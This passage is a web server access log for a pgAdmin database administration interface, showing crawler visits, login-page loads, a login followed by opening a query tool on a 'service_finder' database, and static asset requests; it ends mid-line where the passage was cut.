+[24/Jan/2026:07:11:59 +0000] - 404 404 - GET https db.profibot.hu "/robots.txt" [Client 74.7.230.46] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "http://db.profibot.hu/robots.txt" +[24/Jan/2026:07:26:50 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 149.57.180.16] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:07:26:50 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 149.57.180.16] [Length 2420] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:11:09:11 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 149.57.180.186] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:11:09:11 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 149.57.180.186] [Length 2423] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:18:24:43 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.2.117] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:18:24:43 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.2.117] [Length 2495] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:18:24:44 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.2.117] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[24/Jan/2026:18:24:44 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.2.117] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[25/Jan/2026:00:29:18 +0000] - - 301 - GET http db.profibot.hu "/" [Client 34.122.147.229] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[25/Jan/2026:00:29:19 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 104.197.69.115] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[25/Jan/2026:00:29:19 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 104.197.69.115] [Length 2308] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[25/Jan/2026:00:29:19 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/style.css?ver=91100" [Client 104.197.69.115] [Length 87470] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[25/Jan/2026:00:29:20 +0000] - 302 302 - GET https db.profibot.hu "/static/vendor/require/require.min.js?ver=91100" [Client 34.122.147.229] [Length 205] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[25/Jan/2026:00:29:20 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.react.js?ver=91100" [Client 34.123.170.104] [Length 150876] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[25/Jan/2026:00:29:20 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 34.122.147.229] [Length 167356] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[25/Jan/2026:00:29:20 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.main.js?ver=91100" [Client 34.123.170.104] [Length 313733] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[25/Jan/2026:00:29:20 +0000] - 302 302 - GET https db.profibot.hu "/browser/" [Client 34.72.176.129] [Length 229] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[25/Jan/2026:00:29:20 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 34.123.170.104] [Length 5734] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[25/Jan/2026:00:29:20 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/browser/" [Client 34.123.170.104] [Length 2279] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[25/Jan/2026:00:29:21 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 34.123.170.104] [Length 2321194] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[26/Jan/2026:02:39:18 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 204.76.203.25] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[26/Jan/2026:02:39:18 +0000] - 200 200 - GET https db.profibot.hu "/login" [Client 204.76.203.25] [Length 6219] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[26/Jan/2026:07:29:55 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:29:55 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.1.26.27] [Length 2494] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:29:56 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[26/Jan/2026:07:29:56 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[26/Jan/2026:09:36:25 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:09:36:25 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.1.26.27] [Length 2493] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:09:36:26 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[26/Jan/2026:09:36:26 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[26/Jan/2026:09:36:32 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:09:36:32 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.1.26.27] [Length 2493] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:09:36:33 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[26/Jan/2026:09:36:33 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[26/Jan/2026:09:36:39 +0000] - 302 302 - POST https db.profibot.hu "/authenticate/login" [Client 84.1.26.27] [Length 199] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[26/Jan/2026:09:36:39 +0000] - 200 200 - GET https db.profibot.hu "/login" [Client 84.1.26.27] [Length 2489] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[26/Jan/2026:09:36:39 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login" +[26/Jan/2026:09:36:39 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login" +[26/Jan/2026:09:36:53 +0000] - 302 302 - POST https db.profibot.hu "/authenticate/login" [Client 84.1.26.27] [Length 205] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/browser/" [Client 84.1.26.27] [Length 2933] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/browser/browser.css?ver=91100" [Client 84.1.26.27] [Length 4180] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/browser_nodes.js?ver=91100" [Client 84.1.26.27] [Length 27716] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/app.bundle.js?ver=91100" [Client 84.1.26.27] [Length 567018] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/messages.js?ver=91100" [Client 84.1.26.27] [Length 883] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/utils.js?ver=91100" [Client 84.1.26.27] [Length 3129] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/supported_servers.js?ver=91100" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/user_management/current_user.js?ver=91100" [Client 84.1.26.27] [Length 475] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/static/js/pgadmin.js?ver=91100" [Client 84.1.26.27] [Length 1209] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/static/js/gettext.js?ver=91100" [Client 84.1.26.27] [Length 577] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:53 +0000] - 200 200 - GET https db.profibot.hu "/browser/check_corrupted_db_file" [Client 84.1.26.27] [Length 61] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/misc/bgprocess/" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/preferences/get_all" [Client 84.1.26.27] [Length 11809] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/settings/get_tree_state/" [Client 84.1.26.27] [Length 457] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/browser/nodes/" [Client 84.1.26.27] [Length 273] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - POST https db.profibot.hu "/browser/master_password" [Client 84.1.26.27] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/settings/object_explorer_filter" [Client 84.1.26.27] [Length 95] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/browser/server_group/static/img/server_group.svg?ver=91100" [Client 84.1.26.27] [Length 1432] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/fonts/fa-regular-400..woff2" [Client 84.1.26.27] [Length 18988] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/fonts/fa-solid-900..woff2" [Client 84.1.26.27] [Length 113152] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +[26/Jan/2026:09:36:54 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" [Client 84.1.26.27] [Length 2906] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/browser/browser.css?ver=91100" [Client 84.1.26.27] [Length 4180] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/sqleditor.js?ver=91100" [Client 84.1.26.27] [Length 458176] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/utils.js?ver=91100" [Client 84.1.26.27] [Length 3131] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/messages.js?ver=91100" [Client 84.1.26.27] [Length 883] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/user_management/current_user.js?ver=91100" [Client 84.1.26.27] [Length 475] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/supported_servers.js?ver=91100" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:36:54 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:36:55 +0000] - 200 200 - GET https db.profibot.hu "/misc/upgrade_check?trigger_update_check=false" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:55 +0000] - 200 200 - GET https db.profibot.hu "/settings/get_tool_data/3857941" [Client 84.1.26.27] [Length 316] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:36:55 +0000] - 428 428 - POST https db.profibot.hu "/sqleditor/initialize/sqleditor/3857941/1/2/16384" [Client 84.1.26.27] [Length 285] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:36:55 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/fonts/SourceCodePro-Regular..ttf" [Client 84.1.26.27] [Length 192740] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +[26/Jan/2026:09:36:55 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:36:56 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip 